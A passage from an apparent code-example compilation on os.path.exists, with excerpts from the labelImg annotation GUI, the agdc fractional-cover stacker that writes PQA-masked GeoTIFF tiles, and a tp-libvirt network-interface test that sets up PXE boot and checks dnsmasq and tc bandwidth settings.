        self.dock.setWidget(self.labelListContainer)

        # Tzutalin 20160906 : Add file list and dock to move faster
        self.fileListWidget = QListWidget()
        self.fileListWidget.itemDoubleClicked.connect(self.fileitemDoubleClicked)
        filelistLayout = QVBoxLayout()
        filelistLayout.setContentsMargins(0, 0, 0, 0)
        filelistLayout.addWidget(self.fileListWidget)
        self.fileListContainer = QWidget()
        self.fileListContainer.setLayout(filelistLayout)
        self.filedock = QDockWidget(u'File List', self)
        self.filedock.setObjectName(u'Files')
        self.filedock.setWidget(self.fileListContainer)

        self.zoomWidget = ZoomWidget()
        self.colorDialog = ColorDialog(parent=self)

        self.canvas = Canvas()
        self.canvas.zoomRequest.connect(self.zoomRequest)

        scroll = QScrollArea()
        scroll.setWidget(self.canvas)
        scroll.setWidgetResizable(True)
        self.scrollBars = {
            Qt.Vertical: scroll.verticalScrollBar(),
            Qt.Horizontal: scroll.horizontalScrollBar()
            }
        self.canvas.scrollRequest.connect(self.scrollRequest)

        self.canvas.newShape.connect(self.newShape)
        self.canvas.shapeMoved.connect(self.setDirty)
        self.canvas.selectionChanged.connect(self.shapeSelectionChanged)
        self.canvas.drawingPolygon.connect(self.toggleDrawingSensitive)

        self.setCentralWidget(scroll)
        self.addDockWidget(Qt.RightDockWidgetArea, self.dock)
        # Tzutalin 20160906 : Add file list and dock to move faster
        self.addDockWidget(Qt.RightDockWidgetArea, self.filedock)
        self.dockFeatures = QDockWidget.DockWidgetClosable\
                          | QDockWidget.DockWidgetFloatable
        self.dock.setFeatures(self.dock.features() ^ self.dockFeatures)

        # Actions
        action = partial(newAction, self)
        quit = action('&Quit', self.close,
                'Ctrl+Q', 'quit', u'Quit application')
        open = action('&Open', self.openFile,
                'Ctrl+O', 'open', u'Open image or label file')

        opendir = action('&Open Dir', self.openDir,
                'Ctrl+u', 'open', u'Open Dir')

        changeSavedir = action('&Change default saved Annotation dir', self.changeSavedir,
                'Ctrl+r', 'open', u'Change default saved Annotation dir')

        openAnnotation = action('&Open Annotation', self.openAnnotation,
                'Ctrl+q', 'openAnnotation', u'Open Annotation')

        openNextImg = action('&Next Image', self.openNextImg,
                'n', 'next', u'Open Next')

        openPrevImg = action('&Prev Image', self.openPrevImg,
                'p', 'prev', u'Open Prev')

        save = action('&Save', self.saveFile,
                'Ctrl+S', 'save', u'Save labels to file', enabled=False)
        saveAs = action('&Save As', self.saveFileAs,
                'Ctrl+Shift+S', 'save-as', u'Save labels to a different file',
                enabled=False)
        close = action('&Close', self.closeFile,
                'Ctrl+W', 'close', u'Close current file')
        color1 = action('Box &Line Color', self.chooseColor1,
                'Ctrl+L', 'color_line', u'Choose Box line color')
        color2 = action('Box &Fill Color', self.chooseColor2,
                'Ctrl+Shift+L', 'color', u'Choose Box fill color')

        createMode = action('Create\nRectBox', self.setCreateMode,
                'Ctrl+N', 'new', u'Start drawing Boxs', enabled=False)
        editMode = action('&Edit\nRectBox', self.setEditMode,
                'Ctrl+J', 'edit', u'Move and edit Boxs', enabled=False)

        create = action('Create\nRectBox', self.createShape,
                'Ctrl+N', 'new', u'Draw a new Box', enabled=False)
        delete = action('Delete\nRectBox', self.deleteSelectedShape,
                'Delete', 'delete', u'Delete', enabled=False)
        copy = action('&Duplicate\nRectBox', self.copySelectedShape,
                'Ctrl+D', 'copy', u'Create a duplicate of the selected Box',
                enabled=False)

        advancedMode = action('&Advanced Mode', self.toggleAdvancedMode,
                'Ctrl+Shift+A', 'expert', u'Switch to advanced mode',
                checkable=True)

        hideAll = action('&Hide\nRectBox', partial(self.togglePolygons, False),
                'Ctrl+H', 'hide', u'Hide all Boxs',
                enabled=False)
        showAll = action('&Show\nRectBox', partial(self.togglePolygons, True),
                'Ctrl+A', 'hide', u'Show all Boxs',
                enabled=False)

        help = action('&Tutorial', self.tutorial, 'Ctrl+T', 'help',
                u'Show demos')

        zoom = QWidgetAction(self)
        zoom.setDefaultWidget(self.zoomWidget)
        self.zoomWidget.setWhatsThis(
            u"Zoom in or out of the image. Also accessible with"\
             " %s and %s from the canvas." % (fmtShortcut("Ctrl+[-+]"),
                 fmtShortcut("Ctrl+Wheel")))
        self.zoomWidget.setEnabled(False)

        zoomIn = action('Zoom &In', partial(self.addZoom, 10),
                'Ctrl++', 'zoom-in', u'Increase zoom level', enabled=False)
        zoomOut = action('&Zoom Out', partial(self.addZoom, -10),
                'Ctrl+-', 'zoom-out', u'Decrease zoom level', enabled=False)
        zoomOrg = action('&Original size', partial(self.setZoom, 100),
                'Ctrl+=', 'zoom', u'Zoom to original size', enabled=False)
        fitWindow = action('&Fit Window', self.setFitWindow,
                'Ctrl+F', 'fit-window', u'Zoom follows window size',
                checkable=True, enabled=False)
        fitWidth = action('Fit &Width', self.setFitWidth,
                'Ctrl+Shift+F', 'fit-width', u'Zoom follows window width',
                checkable=True, enabled=False)
        # Group zoom controls into a list for easier toggling.
        zoomActions = (self.zoomWidget, zoomIn, zoomOut, zoomOrg, fitWindow, fitWidth)
        self.zoomMode = self.MANUAL_ZOOM
        self.scalers = {
            self.FIT_WINDOW: self.scaleFitWindow,
            self.FIT_WIDTH: self.scaleFitWidth,
            # Set to one to scale to 100% when loading files.
            self.MANUAL_ZOOM: lambda: 1,
        }

        edit = action('&Edit Label', self.editLabel,
                'Ctrl+E', 'edit', u'Modify the label of the selected Box',
                enabled=False)
        self.editButton.setDefaultAction(edit)

        shapeLineColor = action('Shape &Line Color', self.chshapeLineColor,
                icon='color_line', tip=u'Change the line color for this specific shape',
                enabled=False)
        shapeFillColor = action('Shape &Fill Color', self.chshapeFillColor,
                icon='color', tip=u'Change the fill color for this specific shape',
                enabled=False)

        labels = self.dock.toggleViewAction()
        labels.setText('Show/Hide Label Panel')
        labels.setShortcut('Ctrl+Shift+L')

        # Label list context menu.
        labelMenu = QMenu()
        addActions(labelMenu, (edit, delete))
        self.labelList.setContextMenuPolicy(Qt.CustomContextMenu)
        self.labelList.customContextMenuRequested.connect(self.popLabelListMenu)

        # Store actions for further handling.
        self.actions = struct(save=save, saveAs=saveAs, open=open, close=close,
                lineColor=color1, fillColor=color2,
                create=create, delete=delete, edit=edit, copy=copy,
                createMode=createMode, editMode=editMode, advancedMode=advancedMode,
                shapeLineColor=shapeLineColor, shapeFillColor=shapeFillColor,
                zoom=zoom, zoomIn=zoomIn, zoomOut=zoomOut, zoomOrg=zoomOrg,
                fitWindow=fitWindow, fitWidth=fitWidth,
                zoomActions=zoomActions,
                fileMenuActions=(open,opendir,save,saveAs,close,quit),
                beginner=(), advanced=(),
                editMenu=(edit, copy, delete, None, color1, color2),
                beginnerContext=(create, edit, copy, delete),
                advancedContext=(createMode, editMode, edit, copy,
                    delete, shapeLineColor, shapeFillColor),
                onLoadActive=(close, create, createMode, editMode),
                onShapesPresent=(saveAs, hideAll, showAll))

        self.menus = struct(
                file=self.menu('&File'),
                edit=self.menu('&Edit'),
                view=self.menu('&View'),
                help=self.menu('&Help'),
                recentFiles=QMenu('Open &Recent'),
                labelList=labelMenu)

        addActions(self.menus.file,
                (open, opendir, changeSavedir, openAnnotation, self.menus.recentFiles, save, saveAs, close, None, quit))
        addActions(self.menus.help, (help,))
        addActions(self.menus.view, (
            labels, advancedMode, None,
            hideAll, showAll, None,
            zoomIn, zoomOut, zoomOrg, None,
            fitWindow, fitWidth))

        self.menus.file.aboutToShow.connect(self.updateFileMenu)

        # Custom context menu for the canvas widget:
        addActions(self.canvas.menus[0], self.actions.beginnerContext)
        addActions(self.canvas.menus[1], (
            action('&Copy here', self.copyShape),
            action('&Move here', self.moveShape)))

        self.tools = self.toolbar('Tools')
        self.actions.beginner = (
            open, opendir, openNextImg, openPrevImg, save, None, create, copy, delete, None,
            zoomIn, zoom, zoomOut, fitWindow, fitWidth)

        self.actions.advanced = (
            open, save, None,
            createMode, editMode, None,
            hideAll, showAll)

        self.statusBar().showMessage('%s started.' % __appname__)
        self.statusBar().show()

        # Application state.
        self.image = QImage()
        self.filename = filename
        self.recentFiles = []
        self.maxRecent = 7
        self.lineColor = None
        self.fillColor = None
        self.zoom_level = 100
        self.fit_window = False

        # XXX: Could be completely declarative.
        # Restore application settings.
        types = {
            'filename': QString,
            'recentFiles': QStringList,
            'window/size': QSize,
            'window/position': QPoint,
            'window/geometry': QByteArray,
            # Docks and toolbars:
            'window/state': QByteArray,
            'savedir': QString,
            'lastOpenDir': QString,
        }
        self.settings = settings = Settings(types)
        self.recentFiles = list(settings['recentFiles'])
        size = settings.get('window/size', QSize(600, 500))
        position = settings.get('window/position', QPoint(0, 0))
        self.resize(size)
        self.move(position)
        saveDir = settings.get('savedir', None)
        self.lastOpenDir = settings.get('lastOpenDir', None)
        if os.path.exists(unicode(saveDir)):
            self.defaultSaveDir = unicode(saveDir)
            self.statusBar().showMessage('%s started. Annotation will be saved to %s' %(__appname__, self.defaultSaveDir))
            self.statusBar().show()

        # or simply:
        #self.restoreGeometry(settings['window/geometry'])
        self.restoreState(settings['window/state'])
        self.lineColor = QColor(settings.get('line/color', Shape.line_color))
        self.fillColor = QColor(settings.get('fill/color', Shape.fill_color))
        Shape.line_color = self.lineColor
        Shape.fill_color = self.fillColor

        if settings.get('advanced', QVariant()).toBool():
            self.actions.advancedMode.setChecked(True)
            self.toggleAdvancedMode()

        # Populate the File menu dynamically.
        self.updateFileMenu()
        # Since loading the file may take some time, make sure it runs in the background.
        self.queueEvent(partial(self.loadFile, self.filename))

        # Callbacks:
        self.zoomWidget.valueChanged.connect(self.paintCanvas)

        self.populateModeActions()
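
Note: the settings-restore step above only adopts the remembered save directory when os.path.exists confirms it is still present on disk. A minimal sketch of that guard, assuming a plain settings dict and a hypothetical restore_save_dir helper rather than the project's Settings class:

import os

def restore_save_dir(settings, fallback=None):
    """Return the remembered save directory if it still exists, else a fallback."""
    save_dir = settings.get('savedir')  # hypothetical settings mapping
    if save_dir and os.path.exists(save_dir):
        return save_dir
    return fallback

# Usage (illustrative only):
# default_save_dir = restore_save_dir({'savedir': '/tmp/annotations'}, fallback=os.getcwd())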

Example 118

Project: agdc
Source File: fc_stacker.py
View license
    def derive_datasets(self, input_dataset_dict, stack_output_info, tile_type_info):
        """ Overrides abstract function in stacker class. Called in Stacker.stack_derived() function. 
        Creates PQA-masked FC stack
        
        Arguments:
            input_dataset_dict: Dict keyed by processing level (e.g. ORTHO, FC, PQA, DEM)
                containing all tile info which can be used within the function
                A sample is shown below (including superfluous band-specific information):
                
{
'FC': {'band_name': 'Visible Blue',
    'band_tag': 'B10',
    'end_datetime': datetime.datetime(2000, 2, 9, 23, 46, 36, 722217),
    'end_row': 77,
    'level_name': 'FC',
    'nodata_value': -999L,
    'path': 91,
    'satellite_tag': 'LS7',
    'sensor_name': 'ETM+',
    'start_datetime': datetime.datetime(2000, 2, 9, 23, 46, 12, 722217),
    'start_row': 77,
    'tile_layer': 1,
    'tile_pathname': '/g/data/v10/datacube/EPSG4326_1deg_0.00025pixel/LS7_ETM/150_-025/2000/LS7_ETM_FC_150_-025_2000-02-09T23-46-12.722217.tif',
    'x_index': 150,
    'y_index': -25},
'ORTHO': {'band_name': 'Thermal Infrared (Low Gain)',
     'band_tag': 'B61',
     'end_datetime': datetime.datetime(2000, 2, 9, 23, 46, 36, 722217),
     'end_row': 77,
     'level_name': 'ORTHO',
     'nodata_value': 0L,
     'path': 91,
     'satellite_tag': 'LS7',
     'sensor_name': 'ETM+',
     'start_datetime': datetime.datetime(2000, 2, 9, 23, 46, 12, 722217),
     'start_row': 77,
     'tile_layer': 1,
     'tile_pathname': '/g/data/v10/datacube/EPSG4326_1deg_0.00025pixel/LS7_ETM/150_-025/2000/LS7_ETM_ORTHO_150_-025_2000-02-09T23-46-12.722217.tif',
     'x_index': 150,
     'y_index': -25},
'PQA': {'band_name': 'Pixel Quality Assurance',
    'band_tag': 'PQA',
    'end_datetime': datetime.datetime(2000, 2, 9, 23, 46, 36, 722217),
    'end_row': 77,
    'level_name': 'PQA',
    'nodata_value': None,
    'path': 91,
    'satellite_tag': 'LS7',
    'sensor_name': 'ETM+',
    'start_datetime': datetime.datetime(2000, 2, 9, 23, 46, 12, 722217),
    'start_row': 77,
    'tile_layer': 1,
    'tile_pathname': '/g/data/v10/datacube/EPSG4326_1deg_0.00025pixel/LS7_ETM/150_-025/2000/LS7_ETM_PQA_150_-025_2000-02-09T23-46-12.722217.tif',
    'x_index': 150,
    'y_index': -25}
}                
                
        Arguments (Cont'd):
            stack_output_info: dict containing stack output information. 
                Obtained from stacker object. 
                A sample is shown below
                
stack_output_info = {'x_index': 144, 
                      'y_index': -36,
                      'stack_output_dir': '/g/data/v10/tmp/ndvi',
                      'start_datetime': None, # Datetime object or None
                      'end_datetime': None, # Datetime object or None 
                      'satellite': None, # String or None 
                      'sensor': None} # String or None 
                      
        Arguments (Cont'd):
            tile_type_info: dict containing tile type information. 
                Obtained from stacker object (e.g: stacker.tile_type_dict[tile_type_id]). 
                A sample is shown below
                
{'crs': 'EPSG:4326',
    'file_extension': '.tif',
    'file_format': 'GTiff',
    'format_options': 'COMPRESS=LZW,BIGTIFF=YES',
    'tile_directory': 'EPSG4326_1deg_0.00025pixel',
    'tile_type_id': 1L,
    'tile_type_name': 'Unprojected WGS84 1-degree at 4000 pixels/degree',
    'unit': 'degree',
    'x_origin': 0.0,
    'x_pixel_size': Decimal('0.00025000000000000000'),
    'x_pixels': 4000L,
    'x_size': 1.0,
    'y_origin': 0.0,
    'y_pixel_size': Decimal('0.00025000000000000000'),
    'y_pixels': 4000L,
    'y_size': 1.0}
                            
        Function must create one or more GDAL-supported output datasets. Useful functions in the
        Stacker class include Stacker.get_pqa_mask(), but it is left to the coder to produce exactly
        what is required for a single slice of the temporal stack of derived quantities.
            
        Returns:
            output_dataset_info: Dict keyed by stack filename
                containing metadata info for GDAL-supported output datasets created by this function.
                Note that the key(s) will be used as the output filename for the VRT temporal stack
                and each dataset created must contain only a single band. An example is as follows:
{'/g/data/v10/tmp/ndvi/NDVI_stack_150_-025.vrt': 
    {'band_name': 'Normalised Differential Vegetation Index with PQA applied',
    'band_tag': 'NDVI',
    'end_datetime': datetime.datetime(2000, 2, 9, 23, 46, 36, 722217),
    'end_row': 77,
    'level_name': 'NDVI',
    'nodata_value': None,
    'path': 91,
    'satellite_tag': 'LS7',
    'sensor_name': 'ETM+',
    'start_datetime': datetime.datetime(2000, 2, 9, 23, 46, 12, 722217),
    'start_row': 77,
    'tile_layer': 1,
    'tile_pathname': '/g/data/v10/tmp/ndvi/LS7_ETM_NDVI_150_-025_2000-02-09T23-46-12.722217.tif',
    'x_index': 150,
    'y_index': -25}
}
        """
        assert type(input_dataset_dict) == dict, 'input_dataset_dict must be a dict'
        
        def create_rgb_tif(input_dataset_path, output_dataset_path, pqa_mask=None, rgb_bands=None, 
                           input_no_data_value=-999, output_no_data_value=0,
                           input_range=()):
            if os.path.exists(output_dataset_path):
                logger.info('Output dataset %s already exists - skipping', output_dataset_path)
                return
            
            if not self.lock_object(output_dataset_path):
                logger.info('Output dataset %s already locked - skipping', output_dataset_path)
                return
            
            if not rgb_bands:
                rgb_bands = [3, 1, 2]
                
            scale_factor = 10000.0 / 255.0 # Scale factor to translate from +ve int16 to byte
            
            input_gdal_dataset = gdal.Open(input_dataset_path) 
            assert input_gdal_dataset, 'Unable to open input dataset %s' % (input_dataset_path)
        
            try:
                # Create multi-band dataset for masked data
                logger.debug('output_dataset path = %s', output_dataset_path)
                gdal_driver = gdal.GetDriverByName('GTiff')
                log_multiline(logger.debug, gdal_driver.GetMetadata(), 'gdal_driver.GetMetadata()')
                output_gdal_dataset = gdal_driver.Create(output_dataset_path, 
                    input_gdal_dataset.RasterXSize, input_gdal_dataset.RasterYSize,
                    len(rgb_bands), gdal.GDT_Byte, ['INTERLEAVE=PIXEL']) #['INTERLEAVE=PIXEL','COMPRESS=NONE','BIGTIFF=YES'])
                assert output_gdal_dataset, 'Unable to open input dataset %s' % output_dataset_path
                output_gdal_dataset.SetGeoTransform(input_gdal_dataset.GetGeoTransform())
                output_gdal_dataset.SetProjection(input_gdal_dataset.GetProjection())
                
                dest_band_no = 0
                for source_band_no in rgb_bands:
                    dest_band_no += 1  
                    logger.debug('Processing source band %d, destination band %d', source_band_no, dest_band_no)
                    input_band_array = input_gdal_dataset.GetRasterBand(source_band_no).ReadAsArray()
                    input_gdal_dataset.FlushCache()
                    
                    output_band_array = (input_band_array / scale_factor).astype(numpy.byte)
                    
                    output_band_array[numpy.logical_or((input_band_array < 0), (input_band_array > 10000))] = output_no_data_value # Set any out-of-bounds values to no-data
                    
                    if pqa_mask is not None: # Need to perform masking
                        output_band_array[numpy.logical_or((input_band_array == input_no_data_value), ~pqa_mask)] = output_no_data_value # Apply PQA mask and no-data value
                    else:
                        output_band_array[(input_band_array == input_no_data_value)] = output_no_data_value # Re-apply no-data value
                    
                    output_band = output_gdal_dataset.GetRasterBand(dest_band_no)
                    output_band.SetNoDataValue(output_no_data_value)
                    output_band.WriteArray(output_band_array)
                    output_band.FlushCache()
                    
                output_gdal_dataset.FlushCache()
            finally:
                self.unlock_object(output_dataset_path)



                
        dtype = {'FC_PV' : gdalconst.GDT_Int16,
                 'FC_NPV' : gdalconst.GDT_Int16,
                 'FC_BS' : gdalconst.GDT_Int16}

        no_data_value = {'FC_PV' : -999,
                         'FC_NPV' : -999,
                         'FC_BS' : -999}
    
        log_multiline(logger.debug, input_dataset_dict, 'input_dataset_dict', '\t')    
       
        # Test function to copy ORTHO & FC band datasets with pixel quality mask applied
        # to an output directory for stacking

        output_dataset_dict = {}
        fc_dataset_info = input_dataset_dict['FC'] # Only need FC data for the FC outputs
        #thermal_dataset_info = input_dataset_dict['ORTHO'] # Could have one or two thermal bands
        
        if fc_dataset_info is None:
            logger.info('FC dataset does not exist')
            return 
        
        fc_dataset_path = fc_dataset_info['tile_pathname']
        
        if input_dataset_dict['PQA'] is None:
            logger.info('PQA dataset for %s does not exist', fc_dataset_path)
            return 
        
        # Get a boolean mask from the PQA dataset (use default parameters for mask and dilation)
        pqa_mask = self.get_pqa_mask(input_dataset_dict['PQA']['tile_pathname']) 
        
        fc_dataset = gdal.Open(fc_dataset_path)
        assert fc_dataset, 'Unable to open dataset %s' % fc_dataset
        
        band_array = None
        # List of outputs to generate from each file
        output_tag_list = ['FC_PV', 'FC_NPV', 'FC_BS']
        input_band_index = 0
        for output_tag in output_tag_list:
            # TODO: Make the stack file name reflect the date range                    
            output_stack_path = os.path.join(self.output_dir, 
                                             re.sub('\+', '', '%s_%+04d_%+04d' % (output_tag,
                                                                                   stack_output_info['x_index'],
                                                                                    stack_output_info['y_index'])))
                                                                                    
            if stack_output_info['start_datetime']:
                output_stack_path += '_%s' % stack_output_info['start_datetime'].strftime('%Y%m%d')
            if stack_output_info['end_datetime']:
                output_stack_path += '_%s' % stack_output_info['end_datetime'].strftime('%Y%m%d')
                
            output_stack_path += '_pqa_stack.vrt'
            
            output_tile_path = os.path.join(self.output_dir, re.sub('\.\w+$', tile_type_info['file_extension'],
                                                                    re.sub('FC', 
                                                                           output_tag,
                                                                           os.path.basename(fc_dataset_path)
                                                                           )
                                                                   )
                                           )
                
            # Copy metadata for eventual inclusion in stack file output
            # This could also be written to the output tile if required
            output_dataset_info = dict(fc_dataset_info)
            output_dataset_info['tile_pathname'] = output_tile_path # This is the most important modification - used to find tiles to stack
            output_dataset_info['band_name'] = '%s with PQA mask applied' % output_tag
            output_dataset_info['band_tag'] = '%s-PQA' % output_tag
            output_dataset_info['tile_layer'] = 1
            output_dataset_info['nodata_value'] = no_data_value[output_tag]

            # Check for existing, valid file
            if self.refresh or not os.path.exists(output_tile_path):

                if self.lock_object(output_tile_path): # Test for concurrent writes to the same file
                    try:
                        # Read whole fc_dataset into one array. 
                        # 62MB for float32 data should be OK for memory depending on what else happens downstream
                        if band_array is None:
                            band_array = fc_dataset.ReadAsArray()

                            # Re-project issues with PQ. REDO the contiguity layer.
                            non_contiguous = (band_array < 0).any(0)
                            pqa_mask[non_contiguous] = False
                                                
                        gdal_driver = gdal.GetDriverByName(tile_type_info['file_format'])
                        #output_dataset = gdal_driver.Create(output_tile_path, 
                        #                                    fc_dataset.RasterXSize, fc_dataset.RasterYSize,
                        #                                    1, fc_dataset.GetRasterBand(1).DataType,
                        #                                    tile_type_info['format_options'].split(','))
                        output_dataset = gdal_driver.Create(output_tile_path, 
                                                            fc_dataset.RasterXSize, fc_dataset.RasterYSize,
                                                            1, dtype[output_tag],
                                                            tile_type_info['format_options'].split(','))
                        assert output_dataset, 'Unable to open output dataset %s'% output_dataset                                   
                        output_dataset.SetGeoTransform(fc_dataset.GetGeoTransform())
                        output_dataset.SetProjection(fc_dataset.GetProjection()) 
            
                        output_band = output_dataset.GetRasterBand(1)
            
                        # Calculate each output here
                        # Remember band_array indices are zero-based

                        data_array = band_array[input_band_index].copy()
                                            
                        if no_data_value[output_tag]:
                            self.apply_pqa_mask(data_array=data_array, pqa_mask=pqa_mask, no_data_value=no_data_value[output_tag])
                        
                        output_band.WriteArray(data_array)
                        output_band.SetNoDataValue(output_dataset_info['nodata_value'])
                        output_band.FlushCache()
                        
                        # This is not strictly necessary - copy metadata to output dataset
                        output_dataset_metadata = fc_dataset.GetMetadata()
                        if output_dataset_metadata:
                            output_dataset.SetMetadata(output_dataset_metadata) 
                            log_multiline(logger.debug, output_dataset_metadata, 'output_dataset_metadata', '\t')    
                        
                        output_dataset.FlushCache()
                        logger.info('Finished writing dataset %s', output_tile_path)
                    finally:
                        self.unlock_object(output_tile_path)
                else:
                    logger.info('Skipped locked dataset %s', output_tile_path)
                    sleep(5) #TODO: Find a nicer way of dealing with contention for the same output tile
                    
            else:
                logger.info('Skipped existing dataset %s', output_tile_path)
        
            output_dataset_dict[output_stack_path] = output_dataset_info
            input_band_index += 1
#                    log_multiline(logger.debug, output_dataset_info, 'output_dataset_info', '\t') 
            # End of loop  
 
        fc_rgb_path = os.path.join(self.output_dir, re.sub('\.\w+$', '.tif', # Write to .tif file
                                                                re.sub('^LS\d_[^_]+_', '', # Remove satellite & sensor reference to allow proper sorting by filename
                                                                       re.sub('FC', # Write to FC_RGB file
                                                                              'FC_RGB',
                                                                              os.path.basename(fc_dataset_path)
                                                                              )
                                                                       )
                                                               )
                                       )
                
        logger.info('Creating FC RGB output file %s', fc_rgb_path)
        create_rgb_tif(input_dataset_path=fc_dataset_path, output_dataset_path=fc_rgb_path, pqa_mask=pqa_mask)
        
        log_multiline(logger.debug, output_dataset_dict, 'output_dataset_dict', '\t')    

        # Datasets processed - return info
        return output_dataset_dict
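
Note: this example calls os.path.exists twice, once in create_rgb_tif() to skip an already-written RGB tif and once, combined with the refresh flag, to decide whether a tile needs to be regenerated. A minimal sketch of that skip-unless-refresh pattern, with a hypothetical builder callable standing in for the GDAL code:

import os

def needs_regeneration(output_path, refresh=False):
    """True when the output is missing or a rebuild is explicitly requested."""
    return refresh or not os.path.exists(output_path)

def build_if_needed(output_path, builder, refresh=False):
    if not needs_regeneration(output_path, refresh):
        print('Skipped existing dataset %s' % output_path)
        return output_path
    builder(output_path)  # hypothetical callable that writes the file
    return output_path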

Example 119

Project: tp-libvirt
Source File: iface_network.py
View license
def run(test, params, env):
    """
    Test interface xml options.

    1.Prepare test environment, destroy or suspend a VM.
    2.Edit xml and start the domain.
    3.Perform test operation.
    4.Recover test environment.
    5.Confirm the test result.
    """
    vm_name = params.get("main_vm")
    vm = env.get_vm(vm_name)

    def prepare_pxe_boot():
        """
        Prepare tftp server and pxe boot files
        """
        pkg_list = ["syslinux", "tftp-server",
                    "tftp", "ipxe-roms-qemu", "wget"]
        # Try to install required packages
        if not utils_misc.yum_install(pkg_list):
            raise error.TestError("Failed ot install "
                                  "required packages")
        boot_initrd = params.get("boot_initrd", "EXAMPLE_INITRD")
        boot_vmlinuz = params.get("boot_vmlinuz", "EXAMPLE_VMLINUZ")
        if boot_initrd.count("EXAMPLE") or boot_vmlinuz.count("EXAMPLE"):
            raise error.TestNAError("Please provide initrd/vmlinuz URL")
        # Download pxe boot images
        utils.run("wget %s -O %s/initrd.img"
                  % (boot_initrd, tftp_root))
        utils.run("wget %s -O %s/vmlinuz"
                  % (boot_vmlinuz, tftp_root))
        utils.run("cp -f /usr/share/syslinux/pxelinux.0 {0};"
                  " mkdir -m 777 -p {0}/pxelinux.cfg".format(tftp_root))
        pxe_file = "%s/pxelinux.cfg/default" % tftp_root
        boot_txt = """
DISPLAY boot.txt
DEFAULT rhel
LABEL rhel
        kernel vmlinuz
        append initrd=initrd.img
PROMPT 1
TIMEOUT 3"""
        with open(pxe_file, 'w') as p_file:
            p_file.write(boot_txt)

    def modify_iface_xml():
        """
        Modify interface xml options
        """
        vmxml = vm_xml.VMXML.new_from_dumpxml(vm_name)
        if pxe_boot:
            # Config boot console for pxe boot
            osxml = vm_xml.VMOSXML()
            osxml.type = vmxml.os.type
            osxml.arch = vmxml.os.arch
            osxml.machine = vmxml.os.machine
            osxml.loader = "/usr/share/seabios/bios.bin"
            osxml.bios_useserial = "yes"
            osxml.bios_reboot_timeout = "-1"
            osxml.boots = ['network']
            del vmxml.os
            vmxml.os = osxml

        xml_devices = vmxml.devices
        iface_index = xml_devices.index(
            xml_devices.by_device_tag("interface")[0])
        iface = xml_devices[iface_index]
        iface_bandwidth = {}
        iface_inbound = ast.literal_eval(iface_bandwidth_inbound)
        iface_outbound = ast.literal_eval(iface_bandwidth_outbound)
        if iface_inbound:
            iface_bandwidth["inbound"] = iface_inbound
        if iface_outbound:
            iface_bandwidth["outbound"] = iface_outbound
        if iface_bandwidth:
            bandwidth = iface.new_bandwidth(**iface_bandwidth)
            iface.bandwidth = bandwidth

        iface_type = params.get("iface_type", "network")
        iface.type_name = iface_type
        source = ast.literal_eval(iface_source)
        if not source:
            source = {"network": "default"}
        net_ifs = utils_net.get_net_if(state="UP")
        # Check whether the source device is valid; if it is not in the
        # host interface list, fall back to the first active interface
        # of the host
        if (iface.type_name == "direct" and
            source.has_key('dev') and
                source['dev'] not in net_ifs):
            logging.warn("Source device %s is not a interface"
                         " of host, reset to %s",
                         source['dev'], net_ifs[0])
            source['dev'] = net_ifs[0]
        del iface.source
        iface.source = source
        iface_model = params.get("iface_model", "virtio")
        iface.model = iface_model
        logging.debug("New interface xml file: %s", iface)
        vmxml.devices = xml_devices
        vmxml.xmltreefile.write()
        vmxml.sync()

    def run_dnsmasq_default_test(key, value=None, exists=True):
        """
        Test dnsmasq configuration.
        """
        conf_file = "/var/lib/libvirt/dnsmasq/default.conf"
        if not os.path.exists(conf_file):
            raise error.TestNAError("Can't find default.conf file")

        configs = ""
        with open(conf_file) as f:
            configs = f.read()
        logging.debug("configs in file %s: %s", conf_file, configs)
        if value:
            config = "%s=%s" % (key, value)
        else:
            config = key

        if not configs.count(config):
            if exists:
                raise error.TestFail("Can't find %s=%s in configuration"
                                     " file" % (key, value))
        else:
            if not exists:
                raise error.TestFail("Found %s=%s in configuration"
                                     " file" % (key, value))

    def run_dnsmasq_addnhosts_test(hostip, hostnames):
        """
        Test host ip and names configuration
        """
        conf_file = "/var/lib/libvirt/dnsmasq/default.addnhosts"
        hosts_re = ".*".join(hostnames)
        configs = ""
        with open(conf_file) as f:
            configs = f.read()
        logging.debug("configs in file %s: %s", conf_file, configs)
        if not re.search(r"%s.*%s" % (hostip, hosts_re), configs, re.M):
            raise error.TestFail("Can't find '%s' in configuration"
                                 " file" % hostip)

    def run_dnsmasq_host_test(iface_mac, guest_ip, guest_name):
        """
        Test host name and ip configuration for dnsmasq
        """
        conf_file = "/var/lib/libvirt/dnsmasq/default.hostsfile"
        config = "%s,%s,%s" % (iface_mac, guest_ip, guest_name)
        configs = ""
        with open(conf_file) as f:
            configs = f.read()
        logging.debug("configs in file %s: %s", conf_file, configs)
        if not configs.count(config):
            raise error.TestFail("Can't find host configuration"
                                 " in file %s" % conf_file)

    def check_class_rules(ifname, rule_id, bandwidth):
        """
        Check bandwidth settings via 'tc class' output
        """
        cmd = "tc class show dev %s" % ifname
        class_output = utils.run(cmd).stdout
        logging.debug("Bandwidth class output: %s", class_output)
        class_pattern = (r"class htb %s.*rate (\d+)Kbit ceil"
                         " (\d+)Kbit burst (\d+)(K?M?)b.*" % rule_id)
        se = re.search(class_pattern, class_output, re.M)
        if not se:
            raise error.TestFail("Can't find outbound setting"
                                 " for htb %s" % rule_id)
        logging.debug("bandwidth from tc output:%s" % str(se.groups()))
        ceil = None
        if bandwidth.has_key("floor"):
            ceil = int(bandwidth["floor"]) * 8
        elif bandwidth.has_key("average"):
            ceil = int(bandwidth["average"]) * 8
        if ceil:
            assert int(se.group(1)) == ceil
        if bandwidth.has_key("peak"):
            assert int(se.group(2)) == int(bandwidth["peak"]) * 8
        if bandwidth.has_key("burst"):
            if se.group(4) == 'M':
                tc_burst = int(se.group(3)) * 1024
            else:
                tc_burst = int(se.group(3))
            assert tc_burst == int(bandwidth["burst"])

    def check_filter_rules(ifname, bandwidth):
        """
        Check bandwidth settings via 'tc filter' output
        """
        cmd = "tc -d filter show dev %s parent ffff:" % ifname
        filter_output = utils.run(cmd).stdout
        logging.debug("Bandwidth filter output: %s", filter_output)
        if not filter_output.count("filter protocol all pref"):
            raise error.TestFail("Can't find 'protocol all' settings"
                                 " in filter rules")
        filter_pattern = ".*police.*rate (\d+)Kbit burst (\d+)(K?M?)b.*"
        se = re.search(r"%s" % filter_pattern, filter_output, re.M)
        if not se:
            raise error.TestFail("Can't find any filter policy")
        logging.debug("bandwidth from tc output:%s" % str(se.groups()))
        logging.debug("bandwidth from setting:%s" % str(bandwidth))
        if bandwidth.has_key("average"):
            assert int(se.group(1)) == int(bandwidth["average"]) * 8
        if bandwidth.has_key("burst"):
            if se.group(3) == 'M':
                tc_burst = int(se.group(2)) * 1024
            else:
